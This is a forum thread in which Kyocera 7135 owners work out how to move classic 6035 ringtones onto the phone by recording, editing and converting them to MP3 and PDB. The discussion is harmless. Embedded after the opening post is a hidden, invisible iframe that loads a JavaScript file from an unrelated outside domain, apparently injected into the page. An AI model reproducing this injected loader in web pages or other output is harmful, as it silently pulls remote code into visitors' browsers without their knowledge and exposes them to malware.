+ Reply to Thread
Page 1 of 2 1 2 LastLast

Kyocera Classic Ringers And The 7135

Is the any way to have classic ringers on the 7135?

I've always wanted Ringer 11 on the Kyocera 2325 Series Phone .

This phone has 2 ringers (9 & 11) I really like because the world doesn't look at you when it rings. I hate that!

Anyway, is there any way to get these types of ringers on the 7135?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

I would think you might be able to play the ringer (assuming you have the old phone still) into the mic of your compuuter, and then record it in an MP3 format,,, and then convert it with the MP3 converter?

Good luck

Originally posted by Big_Kid
    I would think you might be able to play the ringer (assuming you have the old phone still) into the mic of your compuuter, and then record it in an MP3 format,,, and then convert it with the MP3 converter?

Good luck
    I've never had the phone. The only thing I liked about it was the ringer...

jeh
    Yeah, you can do that, but the result sounds awful.

Are these anything like "standard", "option 1" through "option 9", and the "roam" ringer on the 6035? Something could be done there...

Originally posted by jeh
    Yeah, you can do that, but the result sounds awful.

Are these anything like "standard", "option 1" through "option 9", and the "roam" ringer on the 6035? Something could be done there...
    I'm not too sure. I've never heard the 6035 ringers as they've discontinued it so I can't check it out in a store...

They are basic ringers, nothing polyphonic. The one I like is a ring that fades out and repeats. It's hard to describe. It is definately recognizable as a Kyocera when it rings...

Is there a site that has the 6035 ringers?

jeh
    Ok... maybe not.

So on my 6035 ROM I have these standard 6035 ringtones, called "ring", "option 1" through "option 9", and "roam".

Ordinary backup to the PC does not of course store these on the PC. They're in ROM, after all. BUT! Filez can beam them to my 7135. Whereupon they're NOT in ROM. So, I tried this with the "option5" ringer.

However a subsequent hotsync of the 7135 does not bring option5.pdb into the PC. (Once it's in the pdb, I can strip off the header, make a .wav of it, and turn that into an mp3...)

I even tried clearing the "read only" and "backup" attributes with Filez. No help.

Are there any other attributes that I might "tweak" with Filez, that would permit a hotsync to bring this PDB into the PC?

Red
    The only way I have ever found to keep "the world from looking at you" when the phone rings is to have it set to vibrate only mode...but that can cause it's own issues...if you know what I mean.

With the included Kyocera mp3 converter and a decent wav to mp3 conversion software, your ring tone choices are endless...attention getting to descrete.
    Finally a new owner! And loving it!!!

Originally posted by Red
    The only way I have ever found to keep "the world from looking at you" when the phone rings is to have it set to vibrate only mode...but that can cause it's own issues...if you know what I mean.

With the included Kyocera mp3 converter and a decent wav to mp3 conversion software, your ring tone choices are endless...attention getting to descrete.
    It just sucks that I will now have Kyocera and I could have "any" ringer, possibly except the one I like...

There has to be a way to get those ringers...

Red
    Not having owned a Kyo non-smartphone, I can not relate to your dilemma...my ringtones have always been the type that don't make everyone in the room reach for their phone.

If you were to post a sample file of the ringer that you would like I'm sure that someone here would be able to convert it for your use.

Please stop saying "I can't becaues the phone sucks" when as a group we say "We can because the SmartPhone can". Say the magic word..."please" and more people will come to your assistance.
    Finally a new owner! And loving it!!!

Originally posted by Red
    Please stop saying "I can't becaues the phone sucks" when as a group we say "We can because the SmartPhone can". Say the magic word..."please" and more people will come to your assistance.
    Um, ok

Never said any phone sucks here...

Originally posted by Red

If you were to post a sample file of the ringer that you would like I'm sure that someone here would be able to convert it for your use.
    I'm looking for a sample file as I stated previously... (Is there a site that has the 6035 ringers?)

I'll just wait until I get the phone and I'll contact Kyocera. That may be easier

jeh
    Ok, how about fetching this and giving a listen to the various MP3s therein:

6035StandardRingers.zip (165 KB download)

Tell me if any of those are what you're after.

Those were recorded "live" from an actual 6035. Option 1 is missing because I somehow goofed and didn't get a recording of it, but from your description it isn't anything close to what you're after.

I'm attaching the file to this post too, but it won't show up until the mods approve. (After they do, I'll remove the one at my site, so the above link won't work after that.)
    Attached Files

Originally posted by jeh
    Ok... maybe not.

So on my 6035 ROM I have these standard 6035 ringtones, called "ring", "option 1" through "option 9", and "roam".

Ordinary backup to the PC does not of course store these on the PC. They're in ROM, after all. BUT! Filez can beam them to my 7135. Whereupon they're NOT in ROM. So, I tried this with the "option5" ringer.

However a subsequent hotsync of the 7135 does not bring option5.pdb into the PC. (Once it's in the pdb, I can strip off the header, make a .wav of it, and turn that into an mp3...)

I even tried clearing the "read only" and "backup" attributes with Filez. No help.

Are there any other attributes that I might "tweak" with Filez, that would permit a hotsync to bring this PDB into the PC?
    If it's on the 7135, what about coping it to a SD card and transfering it to the computer that way?
    Dan

Originally posted by jeh
    Ok, how about fetching this and giving a listen to the various MP3s therein:

6035StandardRingers.zip (165 KB download)

Tell me if any of those are what you're after.

Those were recorded "live" from an actual 6035. Option 1 is missing because I somehow goofed and didn't get a recording of it, but from your description it isn't anything close to what you're after.

I'm attaching the file to this post too, but it won't show up until the mods approve. (After they do, I'll remove the one at my site, so the above link won't work after that.)
    THAT'S IT!!! It's Option 9!! That's the one!!!

How would one get it onto the 7135?

jeh
    Well, I already have a .wav, it's just that it's a .wav of a recording made with a mic. Now granted it was a halfway decent mic, with a good mic preamp and a DAT recorder, but still, it would be better if we could transfer the bits directly.

But, even if we did that, I'd still have to figure out how to convert from 6035 PDB to wav (stripping off the PDB header and adding the wav header).

In the meantime, I'll see if I can't make 7135 ringers out of these. Check the files section later.

Update: Well I will be a .... !

I went to the 7135's ringer menu... and "Option 5" showed up in there! Even though it's a copy of option5.pdb from a 6035! i.e. it contains .wav data, not .mp3.

It's pretty low-volume though. I wouldn't recc this as a great way to make ringers. We STILL don't have the bits on the PC.

Update 2: Ok, it's posted . Despite having been through a "speaker and mic" path it really doesn't sound bad. It's a lot louder than the directly-transferred PDB file too.

Originally posted by jeh
    Well, I already have a .wav, it's just that it's a .wav of a recording made with a mic. Now granted it was a halfway decent mic, with a good mic preamp and a DAT recorder, but still, it would be better if we could transfer the bits directly.

But, even if we did that, I'd still have to figure out how to convert from 6035 PDB to wav (stripping off the PDB header and adding the wav header).

In the meantime, I'll see if I can't make 7135 ringers out of these. Check the files section later.

Update: Well I will be a .... !

I went to the 7135's ringer menu... and "Option 5" showed up in there! Even though it's a copy of option5.pdb from a 6035! i.e. it contains .wav data, not .mp3.

It's pretty low-volume though. I wouldn't recc this as a great way to make ringers. We STILL don't have the bits on the PC.

Update 2: Ok, it's posted . Despite having been through a "speaker and mic" path it really doesn't sound bad. It's a lot louder than the directly-transferred PDB file too.
    You are the "best"! I am going to upload the .pbd to my Clie and see what I can do. I'll put it in the 7135 when I get it...

Did you mean that the pdb sounds better than the mp3?

jeh
    There are two PDBs we're talking about here. One is the original option9.pdb from the 6035. It contains .wav data.

The other is the one I made. The path to make this was:

Play option9 ringer on 6035 into microphone -> mic preamp -> DAT recorder

Transfer (digitally) DAT recording to PC

Edit resulting .wav file with Sound Forge: Eliminate a bit of edginess caused by 6035's very peaky speaker, trim unnecessary freqs, adjust length of "silent" interval, mute silent periods to zero, amplify so that peaks hit 0.5 dB in the .wav file.

Save .wav file, then save as 64 kbps MP3.

Convert MP3 to PDB for 7135, using the regular MP3-to-PDB converter from Kyocera.

The result sounds very much like the 6035 ringing. It is quite a bit louder however. You can't really say it sounds better than the MP3, because it IS the MP3, it just has a small "header" on it.

Originally posted by jeh
    There are two PDBs we're talking about here. One is the original option9.pdb from the 6035. It contains .wav data.

The other is the one I made. The path to make this was:

Play option9 ringer on 6035 into microphone -> mic preamp -> DAT recorder

Transfer (digitally) DAT recording to PC

Edit resulting .wav file with Sound Forge: Eliminate a bit of edginess caused by 6035's very peaky speaker, trim unnecessary freqs, adjust length of "silent" interval, mute silent periods to zero, amplify so that peaks hit 0.5 dB in the .wav file.

Save .wav file, then save as 64 kbps MP3.

Convert MP3 to PDB for 7135, using the regular MP3-to-PDB converter from Kyocera.

The result sounds very much like the 6035 ringing. It is quite a bit louder however. You can't really say it sounds better than the MP3, because it IS the MP3, it just has a small "header" on it.
    Ah. I can't wait to try it out!!! I just need ther phone.

Got the phone and the ringer is on there!!!

jeh... Any chance you could do the same for option 5 and option 6? Option 9 sounds so good and it nice and loud if I need it....

I would greatly appreciate it....

Thanks

riger

I want an old time phone ringer, you know like the ones on the old dial phones. Now that is when bells were bells! I hope someone will sell or share some software with a great varity of ringers for the 7135. If I was a techno guy I would do it myself